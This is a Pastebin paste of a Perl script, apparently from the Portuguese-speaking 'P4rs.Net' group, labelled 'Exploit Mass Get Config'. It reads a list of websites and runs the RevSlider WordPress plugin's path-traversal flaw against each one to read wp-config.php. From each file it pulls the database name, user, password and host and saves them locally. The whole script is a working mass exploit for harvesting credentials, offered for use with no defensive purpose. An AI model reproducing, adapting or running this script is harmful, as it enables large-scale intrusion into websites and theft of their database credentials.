API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Aug 24th, 2017
53
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.73 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2. # *** P4rs.Net ***
  3.  
  4. use Win32::Console::ANSI;
  5. use Term::ANSIColor;
  6. use LWP::UserAgent;
  7. system(($^O eq 'MSWin32') ? 'cls' : 'clear');
  8. my $script = 'MASS REVSLIDER';
  9. $res="Result";
  10. if (-e $res)
  11. {
  12. }
  13. else
  14. {
  15. mkdir $res or die "Nao Foi Possivel Criar Diretorio: $res";
  16. }
  17. print "\n";
  18. print colored ( " --=[Exploit Mass Get Config]=-- ",'bold on_green'),"\n";
  19. print colored ( " --=[*** P4s.Net ***]=-- ",'bold on_green'),"\n";
  20. print"\n";
  21. print "\n";
  22. print colored ("LISTA DE SITES:",'bold on_yellow ')," ";
  23. chomp(my $lista=<STDIN>);
  24. open (my $lista,'<',$lista) || die "\n [Lista Nao Encontrada]";
  25. my @lista = <$lista>;
  26. foreach $site(@lista) {
  27. if($site !~ /http:\/\//) { $site = "http://$site"; };
  28. getconfig ();
  29. }
  30. sub getconfig{
  31. print colored ("\nTESTANDO SITE ==> $site",'bold on_blue'),"";
  32. $ua = LWP::UserAgent->new(keep_alive => 1);
  33. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  34. $ua->timeout (10);
  35. $config = "wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php";
  36. $conflink = "$site/$config";
  37. $resp = $ua->request(HTTP::Request->new(GET => $conflink ));
  38. $conttt = $resp->content;
  39. if($conttt =~ m/DB_NAME/g){
  40. open(save, '>>Result/Vulneraveis.txt');
  41. print save "[rev confg] $site\n";
  42. close(save);
  43. $resp = $ua->request(HTTP::Request->new(GET => $conflink ));
  44. $cont = $resp->content;
  45. print colored ("[EXTRAINDO INFORMACAO]",'bold on_green'),"\n";sleep(1);
  46. while($cont =~ m/DB_NAME/g){
  47. if ($cont =~ /DB_NAME\', \'(.*)\'\)/){
  48. print color("bold on_red"),"[-]Database Name = $1 \n";
  49. print color 'reset';
  50. open (TEXT, '>>Result/databases.txt');
  51. print TEXT "\n[ DATABASE ] \n$site\n[-]Database Name = $1";
  52. close (TEXT);
  53. }
  54. if ($cont =~ /DB_USER\', \'(.*)\'\)/){
  55. print color("bold on_yellow"),"[-]Database User = $1 \n";
  56. print color 'reset';
  57. open (TEXT, '>>Result/databases.txt');
  58. print TEXT "\n[-]Database User = $1";
  59. close (TEXT)
  60. }
  61. if ($cont =~ /DB_PASSWORD\', \'(.*)\'\)/){
  62. print color("bold on_red"),"[-]Database Password = $1 \n";
  63. print color 'reset';
  64. $pass= $1 ;
  65. open (TEXT, '>>Result/databases.txt');
  66. print TEXT "\nDatabase Password = $pass";
  67. close (TEXT)
  68. }
  69. if ($cont =~ /DB_HOST\', \'(.*)\'\)/){
  70. print color("bold on_yellow"),"[-]Database Host = $1 \n";
  71. print color 'reset';
  72. open (TEXT, '>>Result/databases.txt');
  73. print TEXT "\n[-]Database Host = $1";
  74. close (TEXT)
  75. }
  76. }
  77. }else{
  78. print colored ("[NAO VULNERAVEL]",'bold on_red'),"";
  79. }
  80. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!